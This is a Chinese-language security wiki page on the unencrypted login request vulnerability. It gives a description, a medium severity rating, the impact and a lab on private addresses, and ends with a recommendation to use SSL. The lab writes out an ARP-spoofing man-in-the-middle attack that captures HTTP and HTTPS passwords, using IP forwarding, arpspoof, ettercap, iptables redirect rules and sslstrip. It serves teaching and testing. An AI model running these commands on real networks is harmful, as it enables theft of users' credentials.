secskill
Search…
1.11 未加密登陆请求漏洞

1.11 未加密登陆请求漏洞

漏洞描述

网站对用户登录认证信息未进行加密,敏感信息以明文形式进行传送,易在传输过程中被获取。

漏洞等级

中危

漏洞危害

易造成用户敏感信息泄露与篡改。

漏洞利用

实验环境
kali:192.168.0.105 受害机:192.168.0.106

实战抓取http密码

开启流量转发
echo 1 > /proc/sys/net/ipv4/ip_forward
进行arp欺骗
开启监听
ettercap -Tq -i eth0
目标机登录账户密码
kali返回账户密码

实战抓取https密码

1、[email protected]:~# arpspoof -i eth0 -t 10.10.10.129 10.10.10.2
2、更改Sslstrip 配置文件
vim /etc/ettercap/etter.conf

if you use iptables:

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

将这两行的注释去掉如下:

if you use iptables:

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
3、[email protected]:~# sslstrip -a -f -k
4、[email protected]:~# ettercap -Tq -i eth0

漏洞修复

建议通过加密连接(如SSL)方式进行敏感信息的传送。
Copy link
On this page
1.11 未加密登陆请求漏洞
漏洞描述
漏洞等级
漏洞危害
漏洞利用
if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
if you use iptables:
漏洞修复